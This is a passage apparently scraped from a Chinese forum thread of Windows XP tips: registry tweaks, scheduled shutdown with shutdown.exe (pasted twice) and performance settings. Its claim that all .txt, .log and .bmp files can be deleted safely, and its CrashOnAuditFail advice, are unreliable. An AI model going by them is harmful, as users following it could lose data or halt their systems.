NT\CurrentVersion\Winlogon子键分支,双击LegalNoticeCaption健值,打开“编辑字符串”对话框,在“数值数据”下的文本框中输入自己想要的信息标题,如“哥们儿,你好!”,然后点击“确定”,重新启动。<BR>如果想要改变警告信息的话可以双击LegalNoticeText健值名称,在出现的“编辑字符串”窗口中输入想要显示的警告信息,单击“确定”,重新启动。<BR><BR>10.可用的杀毒软件和防火墙:<BR>Symantec Norton Antivirus Corporate 8.01<BR>Zone Alarm 3.7.159<BR>Norton Personal Firewall 2003 Windows XP操作系统自动关机的实现 <BR><BR><BR><BR><BR> 如果你想出门,但电脑又正在进行工作,这时就要用到自动关机。大多数实现自动关机的方法都是使用一些第三方软件,这样不仅麻烦,而且为实现这个小功能而专门动用一个软件,显的小题大做了!其实Windows XP(Windows 2000也可以)自身就具备定时关机的功能,下面我们就来看看如何实现Windows XP的自动关机。<BR><BR> Windows XP的关机是由Shutdown.exe程序来控制的,位于Windows\System32文件夹中 <BR>。如果想让Windows 2000也实现同样的效果,可以把Shutdown.exe复制到系统目录下。<BR><BR> 比如你的电脑要在22:00关机,可以选择“开始→运行”,输入“at 22:00 Shutdown -s”,这样,到了22点电脑就会出现“系统关机”对话框,默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机,可以输入“Shutdown.exe -s -t 3600”,这里表示60分钟后自动关机,“3600”代表60分钟。<BR><BR> 设置好自动关机后,如果想取消的话,可以在运行中输入“shutdown -a”。另外输入“shutdown -i”,则可以打开设置自动关机对话框,对自动关机进行设置。<BR><BR> Shutdown.exe的参数,每个都具有特定的用途,执行每一个都会产生不同的效果,比如“-s”就表示关闭本地计算机,“-a”表示取消关机操作,下面列出了更多参数,大家可以在Shutdown.exe中按需使用。<BR><BR> -f:强行关闭应用程序<BR><BR> -m \\计算机名:控制远程计算机<BR><BR> -i:显示图形用户界面,但必须是Shutdown的第一个选项<BR><BR> -l:注销当前用户<BR><BR> -r:关机并重启<BR><BR> -t时间:设置关机倒计时<BR><BR> -c "消息内容":输入关机对话框中的消息内容(不能超127个字符) Windows XP操作系统自动关机的实现 <BR><BR><BR><BR><BR> 如果你想出门,但电脑又正在进行工作,这时就要用到自动关机。大多数实现自动关机的方法都是使用一些第三方软件,这样不仅麻烦,而且为实现这个小功能而专门动用一个软件,显的小题大做了!其实Windows XP(Windows 2000也可以)自身就具备定时关机的功能,下面我们就来看看如何实现Windows XP的自动关机。<BR><BR> Windows XP的关机是由Shutdown.exe程序来控制的,位于Windows\System32文件夹中 <BR>。如果想让Windows 2000也实现同样的效果,可以把Shutdown.exe复制到系统目录下。<BR><BR> 比如你的电脑要在22:00关机,可以选择“开始→运行”,输入“at 22:00 Shutdown -s”,这样,到了22点电脑就会出现“系统关机”对话框,默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机,可以输入“Shutdown.exe -s -t 3600”,这里表示60分钟后自动关机,“3600”代表60分钟。<BR><BR> 设置好自动关机后,如果想取消的话,可以在运行中输入“shutdown -a”。另外输入“shutdown -i”,则可以打开设置自动关机对话框,对自动关机进行设置。<BR><BR> Shutdown.exe的参数,每个都具有特定的用途,执行每一个都会产生不同的效果,比如“-s”就表示关闭本地计算机,“-a”表示取消关机操作,下面列出了更多参数,大家可以在Shutdown.exe中按需使用。<BR><BR> -f:强行关闭应用程序<BR><BR> -m \\计算机名:控制远程计算机<BR><BR> -i:显示图形用户界面,但必须是Shutdown的第一个选项<BR><BR> -l:注销当前用户<BR><BR> -r:关机并重启<BR><BR> -t时间:设置关机倒计时<BR><BR> -c "消息内容":输入关机对话框中的消息内容(不能超127个字符) WINDOWS XP的几个小技巧<BR><BR>笔者提示:在做本文的操作前,必须以管理员或 Administrators组成员身份登录才能完成该过程,登陆进入Windows XP操作系统。<BR><BR> 一、自动关闭停止响应的程序<BR><BR>??在Windows XP操作系统中,这个设置可以使Windows XP当诊测到某个应用程序已经停止相应时可以自动关闭它,而不需要进行麻烦的手工干预。想要实现这个功能,就请点击“开始”→“运行”输入“RegEdit”打开注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop分支,将AutoEndTasks的键值设置为1即可。 <BR><BR> 二、加快启动和减少故障恢复时间<BR><BR>??也许你的计算机中是Windows9X与WindowsXP共存,用户完全可以减少Windows XP操作系统启动的时候显示操作系统列表的时间。请点击“开始”→“运行”输入“msconfig”打开“系统配置实用程序”→“BOOT.INI”,将超时设置改为你想要的时间,如果你是一个忠实的Windows XP操作系统的使用者,笔者建议你完全可以把启动等待时间设置为5秒。或者右键单击“我的电脑”→“属性”→“高级”,在“启动和故障恢复”中点击“设置”,可以设置显示操作系统列表的时间,单击“编辑”也可以手动编辑启动选项,将timeout=30改为timeout=5即可。<BR><BR> <BR><BR> 三、如何减少磁盘空间的浪费<BR><BR>??在Windows XP操作系统运行过程中,常常会产生后缀名诸如tmp、bak、log、old、txt 等的文件,这些文件其实都是可以进行安全删除的,甚至包括Windows目录下面的bmp文件,如果你不喜欢Windows XP中自带的那些墙纸的话。完全可以删除掉这些文件。<BR><BR>??在Windows XP操作系统Windows\temp目录下面的文件,笔者也建议你删除掉,那些都是在安装应用软件的过程中遗留下的多余文件。还有一点,就是在硬盘中的小文件,请尽可能地把它们集中起来,然后用WinZip这样的压缩软件合并成一个大文件,从而达到减少磁盘空间浪费的目的。 <BR><BR> 四、优化页面文件<BR><BR> 现在主流计算机的内存配置已经提升到128MB,不过对于庞大的WindowsXP操作系统以及功能越来越强大、占用系统内存资源也越来越多的各种软件来说,128MB还是远远不能满足要求的,这时候WindowsXP使用的页面文件(功能相当于我们常说的虚拟内存)就可以发挥其作用了。它将一部分硬盘空间设置为虚拟内存,从而扩大了计算机的可用“内存”空间来满足程序的运行要求。<BR><BR> 由于Windows XP是动态分配页面文件,Windows XP会不停地在硬盘中扩大空间来满足程序运行的要求。这样会导致系统工作效率的降低和系统反应的延迟。所以,就将虚拟内存设置为静态的。微软的建议是页面文件的最小值,应该是当前系统内存容量再加上12MB(RAM+12MB),对于一台拥有128MB内存的机器和一台512MB内存的机器,优化性能的规则肯定不同。对于一台装有128MB的机器,页面文件的设置可根据这样一个公式计算:内存空间大小×1.75。对于一台装有256MB或更多内存的机器,页面文件的设置可根据这样一个公式计算:内存空间大小×1.5。这样才能让操作系统在崩溃或死机前将内存中全部的内容复制到硬盘上。<BR><BR> 具体做法是:右键单击“我的电脑”→“属性”→“高级”,在“性能”选项中点击“设置”→“高级”,在“虚拟内存”选项中点击“更改”,选择“自定义大小”,更改页面文件大小,将初始大小与最大值改为一致,完成后,点击“设置”即可。<BR><BR> <BR><BR> 五、视觉效果<BR><BR>??大家知道,在Windows XP在菜单效果方面比起win9x等兄弟可以说是非常漂亮了,不过对于小内存用户来说,太华丽了,太占内存了,(笔者的256MB内存也只能是基本满足需要)那么该怎么样修改呢?请跟我来:<BR><BR>??1.请点击“开始”→“控制面板”,在“控制面板”的分类视图中选择“性能和维护”→“调整视觉效果”,此时将弹出“性能选项”窗口,在这里选择“调整为最佳性能”可以将菜单的所有动画效果去掉。应该感到速度有明显提高,如果还觉得不够快,请往下看。<BR><BR> <BR><BR>??2.接下来请点击“开始”→“运行”输入“RegEdit”打开注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop分支,在右边窗口双击键值名MenuShowDelay的项,这一项的取值范围是0~100000(单位为毫秒),接下来将默认的值改为0即可。<BR><BR> 六、设置硬盘工作模式<BR><BR>??现在电脑爱好者们所用的硬盘要比过去大得多(因为便宜嘛),动辄30G、400G的。大硬盘一般都支持DMA工作模式,如果确定你的硬盘支持DMA方式,那么你就可以用DMA方式代替传统的PIO方式,这样可以提高硬盘的传输速度并减少你的CPU占用率,以提高你的系统性能。具体做法是:用点击“开始”→“控制面板”→“性能与维护”→“查看电脑基本信息”→“设备管理器”→“IDE ATA/ATAPI控制器”→“IDE通道”→“属性”→“高级设置”,在传送模式中选择“DMA”即可。<BR><BR> <BR><BR> 七、邮件收发程序Outlook Express<BR><BR> 下面这个小技巧可以减少OE出错的机率。 在Outlook Express界面,在菜单上打开“工具”→“帐号”,选择你的帐号,再选择“属性”→“高级”,把服务器超时一项把时间拉到最长(五分钟)。<BR><BR> <BR><BR> 八、处理操作系统安全日志装满时的情况<BR><BR>??1.首先打开事件查看器。单击“开始”→“设置”,然后请你单击“控制面板”,双击“管理工具”,然后再双击“事件查看器”即可。<BR><BR>??2.在随后出现的控制台树中,用右键单击“安全日志”,然后单击“属性”。<BR><BR>??3.接着在“常规”选项卡上,单击“改写久于n天的事件”(默认是7天前)或“不改写事件(手动清除日志)”。 <BR><BR>??4.改变日志文件的大小,默认是512KB。<BR><BR> 5.接下来点击“开始”→“运行”,再输入“RegEdit”命令打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Control\Lsa分支,这时用右键点击“CrashOnAuditFail”,选择创建“REG_DWORD”类型,赋值为1即可。<BR><BR>??6.完成此操作后,需要重新启动你的计算机。
页:
[1]
2